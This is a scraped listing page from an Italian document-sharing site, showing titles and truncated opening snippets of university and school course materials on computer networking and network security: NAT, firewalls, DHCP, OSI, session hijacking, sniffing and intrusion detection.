IP forwarding Firewall e NAT

IP forwarding Firewall e NAT IP forwarding Firewall e NAT A.A. 2004/2005 Walter Cerroni IP forwarding Linux può funzionare da gateway tra due o più reti IP host1 host2 linux-gw 192.168.11.0/24 192.168.10.0/24 Il kernel deve essere

Dettagli

VLSM - Variable Length Subnet Masks E-4: VLSM, Supernetting, NAT/PAT, Firewall

VLSM - Variable Length Subnet Masks E-4: VLSM, Supernetting, NAT/PAT, Firewall VLSM - Variable Length Subnet Masks E-4: VLSM, Supernetting, NAT/PAT, Firewall A. Memo 1987, esce l RFC 1009, che specifica come una sottorete può utilizzare più Subnet Mask ammette lunghezze diverse dell

Dettagli

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP

Indice I rischi: introduzione alle reti connesse a Internet Le reti e il protocollo TCP/IP Indice Capitolo 1 I rischi: introduzione alle reti connesse a Internet 1 1.1 Il virus Worm 3 1.2 Lo stato della rete nel 2002 9 1.3 Cos è Internet 10 1.4 La commutazione di pacchetti: la base della maggior

Dettagli

ISO- OSI e architetture Client-Server

ISO- OSI e architetture Client-Server LEZIONE 9 ISO- OSI e architetture Client-Server Proff. Giorgio Valle Raffaella Folgieri giorgio.valle@unimi.it folgieri@dico.unimi.it Lez 10 modello ISO-OSI e architettura client-server 1 Nelle scorse

Dettagli

Universita di Milano - Polo di Crema Novembre Session Hijacking. Marco Cremonini 1. Marco Cremonini - Corso Integrativo Network Security 1

Universita di Milano - Polo di Crema Novembre Session Hijacking. Marco Cremonini 1. Marco Cremonini - Corso Integrativo Network Security 1 Session Hijacking Marco Cremonini 1 Marco Cremonini - Corso Integrativo Network Security 1 SESSION HIJACKING (lett. dirottare una sessione): una sessione attiva tra un client e un server viene dirottata

Dettagli

Programmazione in Rete

Programmazione in Rete Programmazione in Rete a.a. 2005/2006 http://www.di.uniba.it/~lisi/courses/prog-rete/prog-rete0506.htm dott.ssa Francesca A. Lisi lisi@di.uniba.it Orario di ricevimento: mercoledì ore 10-12 Sommario della

Dettagli

Connessione di reti private ad Internet. Fulvio Risso

Connessione di reti private ad Internet. Fulvio Risso Connessione di reti private ad Internet Fulvio Risso 1 Connessione di reti private ad Internet Diffusione di reti IP private Utilizzo di indirizzi privati Gli indirizzi privati risolvono il problema dell

Dettagli

- Dispensa VI - RETI DI CALCOLATORI

- Dispensa VI - RETI DI CALCOLATORI Elementi di Informatica e Programmazione - Dispensa VI - RETI DI CALCOLATORI Alessandro Saetti (email: alessandro.saetti@unibs.it) Università degli Studi di Brescia 1 Classificazione delle Reti Modalità

Dettagli

REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA

REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA REPERTORIO DELLE QUALIFICAZIONI PROFESSIONALI DELLA REGIONE CAMPANIA SETTORE ECONOMICO PROFESSIONALE 1 Servizi di Processo Sviluppo e gestione di prodotti e servizi informatici Sequenza di processo Definizione

Dettagli

Installazione e Configurazione del servizio DHCP. Orazio Battaglia

Installazione e Configurazione del servizio DHCP. Orazio Battaglia Installazione e Configurazione del servizio Orazio Battaglia Protocollo e Servizio Il protocollo (Dynamic Host Configuration Protocol) è un protocollo di rete di livello applicativo che permette ai dispositivi

Dettagli

4b. Esercizi sul livello di Rete Inoltro in IP

4b. Esercizi sul livello di Rete Inoltro in IP 4b. sul livello di Rete Inoltro in IP 4b-1 o Un router riceve sull interfaccia eth1 una serie di pacchetti. L interfaccia ha come indirizzo MAC bbbb:6c3c:5656:3b34 e l indirizzo IP: 131.175.21.254. Il

Dettagli

Lo strato di applicazione in Internet

Lo strato di applicazione in Internet Lo strato di applicazione in Internet Prof. Ing. Carla Raffaelli a.a. 2004/2005 Protocolli applicativi Sono i protocolli utilizzati dalle applicazioni per scambiarsi informazioni Esempi: HTTP per il web,

Dettagli

Besnate, 24 Ottobre 2009. Oltre il Firewall. pipex08@gmail.com

Besnate, 24 Ottobre 2009. Oltre il Firewall. pipex08@gmail.com Besnate, 24 Ottobre 2009 Oltre il Firewall Autore: Gianluca pipex08@gmail.com Cos'è un firewall i FIREWALL sono i semafori del traffico di rete del nostro PC Stabiliscono le regole per i pacchetti che

Dettagli

Sviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali

Sviluppo siti e servizi web Programmi gestionali Formazione e Consulenza Sicurezza informatica Progettazione e realizzazione di reti aziendali 1 Caratteristiche generali Nati dall esperienza maturata nell ambito della sicurezza informatica, gli ECWALL di e-creation rispondono in modo brillante alle principali esigenze di connettività delle aziende:

Dettagli

Il firewall Packet filtering statico in architetture avanzate

Il firewall Packet filtering statico in architetture avanzate protezione delle reti Il firewall Packet filtering statico in architetture avanzate FABIO GARZIA DOCENTE ESPERTO DI SECURITY UN FIREWALL PERIMETRALE È IL PUNTO CENTRALE DI DIFESA NEL PERIMETRO DI UNA RETE

Dettagli

Sicurezza nelle Reti Esercizi in preparazione all esame versione 1.1.3

Sicurezza nelle Reti Esercizi in preparazione all esame versione 1.1.3 Sicurezza nelle Reti Esercizi in preparazione all esame versione 1.1.3 Indice 1 Note di lettura 4 1.1 Configurazione servizi...................... 5 1.1.1 FTP passivo....................... 5 1.1.2 FTP

Dettagli

Comunicazione tra Computer. Protocolli. Astrazione di Sottosistema di Comunicazione. Modello di un Sottosistema di Comunicazione

Comunicazione tra Computer. Protocolli. Astrazione di Sottosistema di Comunicazione. Modello di un Sottosistema di Comunicazione I semestre 03/04 Comunicazione tra Computer Protocolli Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/professori/auletta/ Università degli studi di Salerno Laurea in Informatica 2

Dettagli

Autore: Bandiera Roberto 2016

Autore: Bandiera Roberto 2016 Configurare il servizio DHCP in uno Switch Multilayer per più VLAN Si vuole attivare la configurazione dinamica degli indirizzi IP nelle diverse VLAN di una rete aziendale. Questo risulta particolarmente

Dettagli

1 - STATO DELL ARTE DEI SISTEMI DI VIDEOSORVEGLIANZA...7

1 - STATO DELL ARTE DEI SISTEMI DI VIDEOSORVEGLIANZA...7 INDICE 1 - STATO DELL ARTE DEI SISTEMI DI VIDEOSORVEGLIANZA...7 1.1 - INTRODUZIONE...7 1.2 - EVOLUZIONE DEI SISTEMI DI VIDEOSORVEGLIANZA...10 1.2.1 - Sistemi di videosorveglianza di prima generazione (first-generation

Dettagli

Esercitazione 7 Sommario Firewall introduzione e classificazione Firewall a filtraggio di pacchetti Regole Ordine delle regole iptables 2 Introduzione ai firewall Problema: sicurezza di una rete Necessità

Dettagli

Le Reti Informatiche

Le Reti Informatiche Le Reti Informatiche modulo 2 Prof. Salvatore Rosta www.byteman.it s.rosta@byteman.it 1 Commutazione di Circuito Le reti telefoniche utilizzano la tecnica della commutazione di circuito. I commutatori

Dettagli

Firewall e Abilitazioni porte (Port Forwarding)

Firewall e Abilitazioni porte (Port Forwarding) Firewall e Abilitazioni porte (Port Forwarding) 1 Introduzione In questa mini-guida mostreremo come creare le regole sul Firewall integrato del FRITZ!Box per consentire l accesso da Internet a dispositivi

Dettagli

Mariarosaria Napolitano. Architettura TCP/IP. Corso di: Laboratorio di tecnologie informatiche e telematiche

Mariarosaria Napolitano. Architettura TCP/IP. Corso di: Laboratorio di tecnologie informatiche e telematiche Mariarosaria Napolitano Architettura TCP/IP Corso di: Laboratorio di tecnologie informatiche e telematiche Contesto e Prerequisiti Contesto E' rivolto agli studenti del V anno degli Istituti Tecnici Industriali

Dettagli

Architetture di sistema

Architetture di sistema Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.6 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio

Dettagli

Intrusion Detection Systems

Intrusion Detection Systems Intrusion Detection Systems Introduzione, Tecnologie, Implementazione Ing. Stefano Zanero Politecnico di Milano Richiamiamo il punto chiave Continuando a usare il paradigma classico Who are you? What can

Dettagli

Realizzazione di una Infrastruttura di Sicurezza

Realizzazione di una Infrastruttura di Sicurezza Realizzazione di una Infrastruttura di Sicurezza Andrea Lanzi, Lorenzo Martignoni e Lorenzo Cavallaro Dipartimento di Informatica e Comunicazione Facoltà di Scienze MM.FF.NN. Università degli Studi di

Dettagli

Intrusion Detection System. Giampaolo Fresi Roglia gianz@security.dico.unimi.it

Intrusion Detection System. Giampaolo Fresi Roglia gianz@security.dico.unimi.it Intrusion Detection System Giampaolo Fresi Roglia gianz@security.dico.unimi.it Sommario Introduzione Richiami alla sicurezza Informatica Intrusion Detection Systems Strategie di monitoraggio Localizzazione

Dettagli

La sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria

La sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria Il C.S.I.F. La sicurezza delle Reti: aspetti tecnici e legislativi Napoli, 16 maggio 2007 Aula Magna Facoltà di Ingegneria I I Pericoli della rete La soluzione adottata al C.S.I.F. Ing. Michelangelo Cudillo

Dettagli

Sicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11

Sicurezza delle reti 1. Uso di variabili. Mattia Monga. a.a. 2010/11 1 Mattia Lezione VIII: Sicurezza perimetrale Dip. di Informatica e Comunicazione Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2010/11 1 c 2011 M.. Creative Commons Attribuzione-Condividi

Dettagli

Reti di Calcolatori Servizi di Rete Laboratorio di Didattica in Rete

Reti di Calcolatori Servizi di Rete Laboratorio di Didattica in Rete Reti di Calcolatori Servizi di Rete Laboratorio di Didattica in Rete Reti di calcolatori Protocolli di Trasmissione: Il modello ISO/OSI L architettura TCP/IP Protocolli di trasmissione Un protocollo di

Dettagli

Trusted Intermediaries

Trusted Intermediaries Sicurezza Trusted Intermediaries Symmetric key problem: How do two entities establish shared secret key over network? Solution: trusted key distribution center (KDC) acting as intermediary between entities

Dettagli

Lo strato di trasporto Firewall e NAT

Lo strato di trasporto Firewall e NAT Lo strato di trasporto Firewall e NAT A.A. 2009/2010 Walter Cerroni Il livello di trasporto in Internet APP. collegamento logico tra i processi applicativi APP. TCP UDP collegamento logico tra i due host

Dettagli

Autore: Bandiera Roberto 2016

Autore: Bandiera Roberto 2016 Access List per controllare il traffico interno di una rete Si vogliono applicare alcune tipiche aziendale. politiche di sicurezza per controllare il traffico interno di una rete Si considera la rete aziendale

Dettagli

Filtraggio del traffico di rete

Filtraggio del traffico di rete Laboratorio di Amministrazione di Sistemi L-A Filtraggio del traffico di rete Si ringraziano sentitamente: Angelo Neri (CINECA) per il materiale sulla classificazione, le architetture ed i principi di

Dettagli

Dal protocollo IP ai livelli superiori

Dal protocollo IP ai livelli superiori Dal protocollo IP ai livelli superiori Prof. Enrico Terrone A. S: 2008/09 Protocollo IP Abbiamo visto che il protocollo IP opera al livello di rete definendo indirizzi a 32 bit detti indirizzi IP che permettono

Dettagli

Gestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS)

Gestione degli accessi al sistema(autenticazione) e ai locali. Analisi del traffico di rete (Firewall, IDS/IPS) Contromisure Contromisure Gestione degli accessi al sistema(autenticazione) e ai locali Antivirus Analisi del traffico di rete (Firewall, IDS/IPS) Analisi utilizzo delle risorse di sistema, accessi (IDS/IPS)

Dettagli

Firewall. Alfredo De Santis. Maggio 2014. Dipartimento di Informatica Università di Salerno. ads@dia.unisa.it http://www.dia.unisa.

Firewall. Alfredo De Santis. Maggio 2014. Dipartimento di Informatica Università di Salerno. ads@dia.unisa.it http://www.dia.unisa. Firewall Alfredo De Santis Dipartimento di Informatica Università di Salerno ads@dia.unisa.it http://www.dia.unisa.it/professori/ads Maggio 2014 Pacchetti I messaggi sono divisi in pacchetti I pacchetti

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it

Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing. Chiara Braghin chiara.braghin@unimi.it Elementi di Sicurezza e Privatezza Laboratorio 6 - Sniffing Chiara Braghin chiara.braghin@unimi.it Sniffing (1) Attività di intercettazione passiva dei dati che transitano in una rete telematica, per:

Dettagli

Architetture di sistema

Architetture di sistema Università di Bergamo Facoltà di Ingegneria Applicazioni Internet B Paolo Salvaneschi B1_1 V1.7 Architetture di sistema Il contenuto del documento è liberamente utilizzabile dagli studenti, per studio

Dettagli

Lezione 8 Il networking. Mauro Piccolo piccolo@di.unito.it

Lezione 8 Il networking. Mauro Piccolo piccolo@di.unito.it Lezione 8 Il networking Mauro Piccolo piccolo@di.unito.it Classificazione delle reti Ampiezza Local Area Network Metropolitan Area Networ Wide Area Network Proprieta' Reti aperte e reti chiuse Topologia

Dettagli

UD 3 PROTOCOLLO ISO-OSI

UD 3 PROTOCOLLO ISO-OSI UD 3 PROTOCOLLO ISO-OSI IL PROTOCOLLO All inizio ogni azienda creava dispositivo hw e sw in grado solo di essere utilizzati e di comunicare con dispositivi dell azienda stessa Sistemi Chiusi Nel tempo

Dettagli